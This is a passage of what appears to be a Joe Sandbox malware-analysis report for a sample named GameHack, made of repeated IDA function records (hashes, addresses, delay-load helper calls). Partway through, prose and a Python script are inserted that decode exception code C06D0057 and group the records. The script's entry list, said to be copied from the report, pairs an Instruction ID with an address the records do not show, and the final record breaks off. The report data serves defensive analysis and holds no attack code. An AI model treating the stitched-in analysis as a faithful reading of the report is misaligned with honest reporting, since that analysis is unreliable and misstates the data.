                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: dbbc7f1ed09e9632a7adbe1ef20afea48a40f9c73a29818c8b34c39198fa8e1d
                                      • Instruction ID: 2381d139ad0871a1480231edefeadc0c15291995cd2a2e92b5db82ea7b1015ea
                                      • Opcode Fuzzy Hash: dbbc7f1ed09e9632a7adbe1ef20afea48a40f9c73a29818c8b34c39198fa8e1d
                                      • Instruction Fuzzy Hash: 40B012A536C5456C714CB10AAD02D7E026CC1C4B60330951AF509F02C2D5809C04B032
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDC36
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 86bce9911f21dfd8a040a3294a3bfced4802977e96f6121c86d904947914ba34
                                      • Instruction ID: b374052fbeb6e59d25a7476cc2dab12eb1b0c1320b7bed0e2b7fc14f9517ccbe
                                      • Opcode Fuzzy Hash: 86bce9911f21dfd8a040a3294a3bfced4802977e96f6121c86d904947914ba34
                                      • Instruction Fuzzy Hash: DAB012A536C6497C714C7106BF02C7E422CC2C0B60330561AF105F01C295C09C44B032
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7971176ce10af75c5f28294827e992fda19072f9ec7dc2dcb4cafdc11f72161a
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 7971176ce10af75c5f28294827e992fda19072f9ec7dc2dcb4cafdc11f72161a
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: c35fa3753dbb0c291041631e32d58d0fd5decb90e0525fa9cf00400cc7621a26
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: c35fa3753dbb0c291041631e32d58d0fd5decb90e0525fa9cf00400cc7621a26
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 2c65a7b420a0a29a65f412612d27749044005e438e8e6cb5b9be3d0f196a5203
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 2c65a7b420a0a29a65f412612d27749044005e438e8e6cb5b9be3d0f196a5203
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 779e98fc97900f126cbc9887b727e032c0495331738edf19136fd21c2de648be
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 779e98fc97900f126cbc9887b727e032c0495331738edf19136fd21c2de648be
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8c6a2931a462748382ba6fc476376932586e0f41f24edf878ea1b91d79f37d67
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 8c6a2931a462748382ba6fc476376932586e0f41f24edf878ea1b91d79f37d67
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: d09e1ab7327670adf268f20be0ccee5e26eff1bc90408b43a18b6e8f33e59e7e
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: d09e1ab7327670adf268f20be0ccee5e26eff1bc90408b43a18b6e8f33e59e7e
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 4b3095be0e9589002abaa4d9c8cf0a463046617677c38df8a41a6ee2e29bf2fb
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 4b3095be0e9589002abaa4d9c8cf0a463046617677c38df8a41a6ee2e29bf2fb
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 01858a4ae65d138a3b3ea6774eee0588d3ae0f90098a71e0975bcf466200cd91
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 01858a4ae65d138a3b3ea6774eee0588d3ae0f90098a71e0975bcf466200cd91
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b773223d614b7f3b2cff9fd002424ab00c2a5925a6bc3340c039b0c461fb9838
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: b773223d614b7f3b2cff9fd002424ab00c2a5925a6bc3340c039b0c461fb9838
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 4b835f12f557381d4b7550344de4363bfc0a1b6ccfab983308eb9d3e28870e03
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 4b835f12f557381d4b7550344de4363bfc0a1b6ccfab983308eb9d3e28870e03
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 26dc10dbdb328637c489b25b82b812e0460d0eabda3530d4baae3a8874784775
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 26dc10dbdb328637c489b25b82b812e0460d0eabda3530d4baae3a8874784775
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 4a1c9cce2797602b2b0769dafe7e54b2515d61e8ed09970b896499ccdf125e25
                                      • Instruction ID: 920f96df3f8919d01b69327d543cc58fa0bcbcc744f17f670e3b5c7b33cc7b5d
                                      • Opcode Fuzzy Hash: 4a1c9cce2797602b2b0769dafe7e54b2515d61e8ed09970b896499ccdf125e25
                                      • Instruction Fuzzy Hash: 8DA0129126D0467C300871036C02C7A024CC0C0B10330551AF00AA008454404C046431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7e23e80382c7a87e0e307219d2c019b958344f61cdb48325a152e56064365a6a
                                      • Instruction ID: 920f96df3f8919d01b69327d543cc58fa0bcbcc744f17f670e3b5c7b33cc7b5d
                                      • Opcode Fuzzy Hash: 7e23e80382c7a87e0e307219d2c019b958344f61cdb48325a152e56064365a6a
                                      • Instruction Fuzzy Hash: 8DA0129126D0467C300871036C02C7A024CC0C0B10330551AF00AA008454404C046431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 09666f0ebef55652f2402372d231796b89be93a857859cba9b691f192b516840
                                      • Instruction ID: 920f96df3f8919d01b69327d543cc58fa0bcbcc744f17f670e3b5c7b33cc7b5d
                                      • Opcode Fuzzy Hash: 09666f0ebef55652f2402372d231796b89be93a857859cba9b691f192b516840
                                      • Instruction Fuzzy Hash: 8DA0129126D0467C300871036C02C7A024CC0C0B10330551AF00AA008454404C046431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 9dae8a88c0346cc74dc483887d4a872895a55dc3bc778d1e281e4d7994d931d6
                                      • Instruction ID: 920f96df3f8919d01b69327d543cc58fa0bcbcc744f17f670e3b5c7b33cc7b5d
                                      • Opcode Fuzzy Hash: 9dae8a88c0346cc74dc483887d4a872895a55dc3bc778d1e281e4d7994d931d6
                                      • Instruction Fuzzy Hash: 8DA0129126D0467C300871036C02C7A024CC0C0B10330551AF00AA008454404C046431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b9ab61cb7f7ce2ae1667b9e20aa4d5bc6f8d165b9e3799049c2f74dac0e7f046
                                      • Instruction ID: 920f96df3f8919d01b69327d543cc58fa0bcbcc744f17f670e3b5c7b33cc7b5d
                                      • Opcode Fuzzy Hash: b9ab61cb7f7ce2ae1667b9e20aa4d5bc6f8d165b9e3799049c2f74dac0e7f046
                                      • Instruction Fuzzy Hash: 8DA0129126D0467C300871036C02C7A024CC0C0B10330551AF00AA008454404C046431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cef848f847b5d7db2672dcf4151135de34b36449e50502bbc31ec5ff6e5120e1
                                      • Instruction ID: 8d42af4c73e413504ed5ec484704fad2d89a084442780c2c2ea5ecd1f4c931fc
                                      • Opcode Fuzzy Hash: cef848f847b5d7db2672dcf4151135de34b36449e50502bbc31ec5ff6e5120e1
                                      • Instruction Fuzzy Hash: B8A0129136D4453C3008B103AC02C7A024CD0C0B11330511AF00AB008454404C046431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
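Every function record above bottoms out in the same place: a call into the MSVC delay-load helper (___delayLoadHelper2@8) whose failure path calls RaiseException with code C06D0057. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code. It decodes that code with the VcppException() layout from delayimp.h (severity 0xC0000000, facility 0x6D, Win32 error in the low 16 bits) and groups the records by Instruction ID so the repeated thunk entries collapse to their distinct code. The entry list is copied from the records above; the error-name table is the set of Win32 errors the MSVC delay-load helper wraps in VcppException().

```python
# Added example (not from the report): decode the RaiseException code used by
# the MSVC delay-load helper and collapse repeated thunk records by Instruction ID.
from collections import OrderedDict

ERROR_SEVERITY_ERROR = 0xC0000000   # NTSTATUS-style severity bits (11 = error)
FACILITY_VISUALCPP = 0x6D           # facility code used by VcppException() in delayimp.h

# Win32 errors that the MSVC delay-load helper (delayhlp.cpp) wraps in VcppException().
DELAYLOAD_ERRORS = {
    87: "ERROR_INVALID_PARAMETER",   # ImgDelayDescr lacks the dlattrRva attribute
    126: "ERROR_MOD_NOT_FOUND",      # LoadLibrary of the delay-loaded DLL failed
    127: "ERROR_PROC_NOT_FOUND",     # GetProcAddress of the delayed import failed
}


def vcpp_exception(severity, win32_error):
    """Reproduce the VcppException(sev, err) macro: sev | (0x6D << 16) | err."""
    return severity | (FACILITY_VISUALCPP << 16) | win32_error


def decode_exception_code(code):
    """Split a 32-bit exception code into (severity, facility, win32 error)."""
    severity = (code >> 30) & 0x3
    facility = (code >> 16) & 0x0FFF
    win32_error = code & 0xFFFF
    return severity, facility, win32_error


def describe_exception_code(code):
    """Name the delay-load failure behind a VcppException code, if it is one."""
    severity, facility, err = decode_exception_code(code)
    if severity == 3 and facility == FACILITY_VISUALCPP and err in DELAYLOAD_ERRORS:
        return f"delay-load failure: {DELAYLOAD_ERRORS[err]} ({err})"
    return f"unrecognised exception code 0x{code:08X}"


# Function records copied from the report entries above:
# (Instruction ID prefix, address of the ___delayLoadHelper2@8 call site).
ENTRIES = [
    ("b2795629", 0x00EED8A3),
    ("b2795629", 0x00EED8A3),
    ("b2795629", 0x00EEDAB2),
    ("920f96df", 0x00EEDAB2),
    ("920f96df", 0x00EEDAB2),
    ("8d42af4c", 0x00EEDBD5),
    ("3d52361a", 0x00EEDC36),
]


def distinct_thunks(entries):
    """Group records by Instruction ID; equal IDs (and equal Instruction Fuzzy
    Hashes in the report) mark entries that carry the same instruction sequence."""
    groups = OrderedDict()
    for instr_id, ref in entries:
        groups.setdefault(instr_id, set()).add(ref)
    return groups


if __name__ == "__main__":
    print(describe_exception_code(0xC06D0057))
    for instr_id, refs in distinct_thunks(ENTRIES).items():
        print(instr_id, [f"{r:08X}" for r in sorted(refs)])
```

C06D0057 decodes to ERROR_INVALID_PARAMETER (87), which the helper raises when a delay-import descriptor does not carry the dlattrRva attribute; the RaiseException arguments shown in the records (flags 0, one parameter) match that call. Because ___delayLoadHelper2@8 is C runtime code emitted by the linker for every delay-loaded import, these records describe compiler-generated import thunks, which is why a handful of Instruction IDs recur across many Opcode IDs.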
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 71b2121e59914296c1ee09f3fb571752f1410ad071236fa6f014ee2027ad3b06
                                      • Instruction ID: 3d52361a50fd35bbfcca09d2ca52f92ec3a980b65eab4d350f3b239e1f43f3e7
                                      • Opcode Fuzzy Hash: 71b2121e59914296c1ee09f3fb571752f1410ad071236fa6f014ee2027ad3b06
                                      • Instruction Fuzzy Hash: C1A0029537D54B7C710852526D17D76025CD4C4B513316519F506B41C16A505C456431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDC36
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 182b6382f1844ae3db27580dfd2e7b9413d2bb99cf33905fd174b7d57152fc07
                                      • Instruction ID: 8ca4586091d0d7428e6630eba5a5c660c90dd814b3addad5715faa6004edd54b
